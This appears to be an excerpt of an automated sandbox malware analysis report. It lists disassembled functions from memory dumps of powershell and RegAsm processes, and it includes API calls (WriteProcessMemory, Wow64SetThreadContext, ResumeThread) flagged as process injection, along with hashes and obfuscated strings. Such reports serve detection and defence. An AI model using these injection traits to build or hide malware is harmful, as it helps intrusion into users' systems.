                                                            • Instruction ID: 5a5b673caeab62c94f47423d2edb8338e9f195250c74ce9f9f216582aa37604e
                                                            • Opcode Fuzzy Hash: 71b34fb6ddcee7eec46a3af6b03e39cb35372143b1e54d91b28f7faf528b062b
                                                            • Instruction Fuzzy Hash: F5914C71E007198FEB24DF68C8817EEBBB2FF49314F1485A9D818A7240DB75A985CF91
                                                            Function 03746740 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 272 3746740-3746796 275 37467a6-37467e5 WriteProcessMemory 272->275 276 3746798-37467a4 272->276 278 37467e7-37467ed 275->278 279 37467ee-374681e 275->279 276->275 278->279
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 037467D8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: eedc8ed62ca391790b8400448ddab762d1b071d730b3d708e06cb32d0a22ad36
                                                            • Instruction ID: 82734ef1603544d002d8a4248374cf1c1fb6c896952073f6fad9c15f9a68d628
                                                            • Opcode Fuzzy Hash: eedc8ed62ca391790b8400448ddab762d1b071d730b3d708e06cb32d0a22ad36
                                                            • Instruction Fuzzy Hash: 602148759003499FDB10CFAAC981BDEBBF5FF48310F148429E918A7240D778A954CBA4
                                                            Function 03746748 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 283 3746748-3746796 285 37467a6-37467e5 WriteProcessMemory 283->285 286 3746798-37467a4 283->286 288 37467e7-37467ed 285->288 289 37467ee-374681e 285->289 286->285 288->289
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 037467D8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 03d0ed365358bd04a35b520cb6327d42044719cfedd7e4a0a7decf79f121f37d
                                                            • Instruction ID: f4531b773f6ece345d56cdc568e8fbe3b9bb575033b6cc62b576933d678a1c77
                                                            • Opcode Fuzzy Hash: 03d0ed365358bd04a35b520cb6327d42044719cfedd7e4a0a7decf79f121f37d
                                                            • Instruction Fuzzy Hash: EA2127759003499FDF10DFAAC981BDEBBF5FF88310F148429E918A7240C778A954CBA4
                                                            Function 037465A8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 293 37465a8-37465fb 296 37465fd-3746609 293->296 297 374660b-374663b Wow64SetThreadContext 293->297 296->297 299 3746644-3746674 297->299 300 374663d-3746643 297->300 300->299
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0374662E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 873b593df327478f9adc01dddb5dcd371a130a85f45cb8907e3185da2e849f96
                                                            • Instruction ID: 43eac616a3ea7ad593c56d8033682459be086b28a07345cfc18e08fbf6204c8f
                                                            • Opcode Fuzzy Hash: 873b593df327478f9adc01dddb5dcd371a130a85f45cb8907e3185da2e849f96
                                                            • Instruction Fuzzy Hash: F9213A719003098FDB10DFAAC4857EEFBF4EF48324F148429D819A7240CB78A945CFA5
                                                            Function 037465B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 304 37465b0-37465fb 306 37465fd-3746609 304->306 307 374660b-374663b Wow64SetThreadContext 304->307 306->307 309 3746644-3746674 307->309 310 374663d-3746643 307->310 310->309
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0374662E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: db2279fc09d75231ad3048aff490dc5202d3fc3c28b2eb56f26ebe20eb43a8f0
                                                            • Instruction ID: f2d0b83924f5a8f3d9dd329883f020b9e8a005ac72ffa844a08c5cc33823015b
                                                            • Opcode Fuzzy Hash: db2279fc09d75231ad3048aff490dc5202d3fc3c28b2eb56f26ebe20eb43a8f0
                                                            • Instruction Fuzzy Hash: C12147719003098FDB10DFAAC4857EEFBF4EF88324F14842AD819A7240CB78A945CFA5
                                                            Function 037464F8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 314 37464f8-374656f ResumeThread 318 3746571-3746577 314->318 319 3746578-374659d 314->319 318->319
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: efa5671608a9fb51f69b166d603f5eddf89283071013d7fb4d2a4c261510c05d
                                                            • Instruction ID: 2480e98f19a879309a4047d0f33353a6250e9b9135aa0590999946910970ec2e
                                                            • Opcode Fuzzy Hash: efa5671608a9fb51f69b166d603f5eddf89283071013d7fb4d2a4c261510c05d
                                                            • Instruction Fuzzy Hash: 3B115B71C003498FDB20DFAAC4457DEFBF4EB88724F148419D429A7240CB796544CF94
                                                            Function 03746500 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 323 3746500-374656f ResumeThread 326 3746571-3746577 323->326 327 3746578-374659d 323->327 326->327
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: f9a84c2d126c7da7cad16126efde84994b3ec66dc224b28d5e97c00ca5fc241f
                                                            • Instruction ID: 295c9bd9dd99b52e9dbb9e6ffda4152a6081e3ee6017a84a8e06b335fd882862
                                                            • Opcode Fuzzy Hash: f9a84c2d126c7da7cad16126efde84994b3ec66dc224b28d5e97c00ca5fc241f
                                                            • Instruction Fuzzy Hash: 2C11F5719003498FDB24DFAAC4457AEFBF9AB88724F248429D519A7240CB79A944CFA4
                                                            Function 07D32740 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1619713096.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7d30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3f369bf1ec6b9895ca5980b60843baff4c66aac3226005c16b2d6029a7fa781
                                                            • Instruction ID: 67db11fdca869314efb17303068f4cc34aa37c049cc580639f786d067cce61fd
                                                            • Opcode Fuzzy Hash: c3f369bf1ec6b9895ca5980b60843baff4c66aac3226005c16b2d6029a7fa781
                                                            • Instruction Fuzzy Hash: 7F215CF0E082468FCB25CF69D944A65FBB1BF46321F09C0ABD444CB162D735E884CBA2
                                                            Function 0342D006 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1585922024.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_342d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67dcaf855178393ac04c9123363631a2bb95154b6ffd1234d29fc374ede0a826
                                                            • Instruction ID: aa595f292c6e50d72f317c0c4980623d59b2be56d7c782a67b9274d4f19f3b41
                                                            • Opcode Fuzzy Hash: 67dcaf855178393ac04c9123363631a2bb95154b6ffd1234d29fc374ede0a826
                                                            • Instruction Fuzzy Hash: 60012D7140E3C09FD7128B258894B56BFB8DF47224F1D81DBD8989F2A3C2695844C772
                                                            Function 0342D01D Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1585922024.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_342d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bf55a0d76e687935fdf7315ac23207576caad0db4c573c83b23c553bd147fa3
                                                            • Instruction ID: b029d26439392b70af6df573ee042e8e44acecaffec83ebbab534d19320fadef
                                                            • Opcode Fuzzy Hash: 9bf55a0d76e687935fdf7315ac23207576caad0db4c573c83b23c553bd147fa3
                                                            • Instruction Fuzzy Hash: 9601F7718043149AE7208A11CC80B67FF98EF82629F18C05BEC686F292C2789842C7B6

                                                            Execution Graph

                                                            Execution Coverage:1.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:18.4%
                                                            Total number of Nodes:38
                                                            Total number of Limit Nodes:4
                                                            execution_graph 13470 408850 13472 40885f 13470->13472 13471 408acf ExitProcess 13472->13471 13473 408ab3 13472->13473 13474 40891c GetCurrentProcessId GetCurrentThreadId 13472->13474 13473->13471 13475 408941 13474->13475 13476 408945 SHGetSpecialFolderPathW GetForegroundWindow 13474->13476 13475->13476 13477 408a3d 13476->13477 13477->13473 13479 40c550 CoInitializeEx 13477->13479 13432 43aa80 13435 43d810 13432->13435 13434 43aa8a RtlAllocateHeap 13436 43d830 13435->13436 13436->13434 13436->13436 13437 40c583 CoInitializeSecurity 13443 43aaa0 13444 43aab3 13443->13444 13445 43aac4 13443->13445 13446 43aab8 RtlFreeHeap 13444->13446 13446->13445 13447 43c767 13449 43c790 13447->13449 13448 43c80e 13449->13448 13451 43c1f0 LdrInitializeThunk 13449->13451 13451->13448 13452 43cce6 13453 43cd00 13452->13453 13455 43cd6e 13453->13455 13459 43c1f0 LdrInitializeThunk 13453->13459 13458 43c1f0 LdrInitializeThunk 13455->13458 13457 43ce4d 13458->13457 13459->13455 13460 43c58a 13462 43c460 13460->13462 13461 43c5f4 13462->13461 13465 43c1f0 LdrInitializeThunk 13462->13465 13464 43c54d 13465->13464 13485 40e71a CoUninitialize CoUninitialize 13466 43c2c8 13467 43c2e0 13466->13467 13467->13467 13468 43ccaf GetForegroundWindow 13467->13468 13469 43ccbe 13468->13469

                                                            Executed Functions

                                                            Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                            • GetForegroundWindow.USER32 ref: 00408A33
                                                              • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                              • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                              • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                            • ExitProcess.KERNEL32 ref: 00408AD1
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                            • String ID:
                                                            • API String ID: 3072701918-0
                                                            • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                            • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                            • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                            • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9
                                                            Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 44 43c1f0-43c222 LdrInitializeThunk
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                            Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 124 43c767-43c78f 125 43c790-43c7d6 124->125 125->125 126 43c7d8-43c7e3 125->126 127 43c810-43c813 126->127 128 43c7e5-43c7f3 126->128 130 43c841-43c862 127->130 129 43c800-43c807 128->129 131 43c815-43c81b 129->131 132 43c809-43c80c 129->132 131->130 134 43c81d-43c839 call 43c1f0 131->134 132->129 133 43c80e 132->133 133->130 136 43c83e 134->136 136->130
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,+*)
                                                            • API String ID: 0-3529585375
                                                            • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                            • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                            • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                            • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                            Function 0040E71A Relevance: 2.5, APIs: 2, Instructions: 8COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 35 40e71a-40e738 CoUninitialize * 2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Uninitialize
                                                            • String ID:
                                                            • API String ID: 3861434553-0
                                                            • Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                            • Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
                                                            • Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                            • Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C
                                                            Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 36 43c2c8-43c2d6 37 43c2e0-43c2fd 36->37 37->37 38 43c2ff-43ccb9 GetForegroundWindow call 43e110 37->38 41 43ccbe-43ccdf 38->41
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 0043CCAF
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: ForegroundWindow
                                                            • String ID:
                                                            • API String ID: 2020703349-0
                                                            • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                            • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                            • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                            • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D
                                                            Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 42 40c550-40c580 CoInitializeEx
                                                            APIs
                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                            • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                            • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                            • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79
                                                            Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 43 40c583-40c5b2 CoInitializeSecurity
                                                            APIs
                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeSecurity
                                                            • String ID:
                                                            • API String ID: 640775948-0
                                                            • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                            • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                            • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                            • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                                            Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 45 43aaa0-43aaac 46 43aab3-43aabe call 43d810 RtlFreeHeap 45->46 47 43aac4-43aac5 45->47 46->47
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                            • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                            • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                            • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8
                                                            Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 50 43aa80-43aa97 call 43d810 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                            • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                            • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                            • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

                                                            Non-executed Functions

                                                            Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                            • API String ID: 0-3492884535
                                                            • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                            • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                            • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                            • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                            Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                            • API String ID: 0-1763234448
                                                            • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                            • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                            • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                            • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                            Function 00419F30 Relevance: 12.2, APIs: 2, Strings: 4, Instructions: 1664COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                            • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                            • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary$InitializeThunk
                                                            • String ID: / $/,-$Wu$46
                                                            • API String ID: 764372645-3330591033
                                                            • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                            • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                            • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                            • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                            Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                            • API String ID: 0-1826372655
                                                            • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                            • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                            • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                            • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                            Function 00415799 Relevance: 9.2, Strings: 7, Instructions: 492COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                            • API String ID: 0-3328159043
                                                            • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                            • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                            • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                            • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
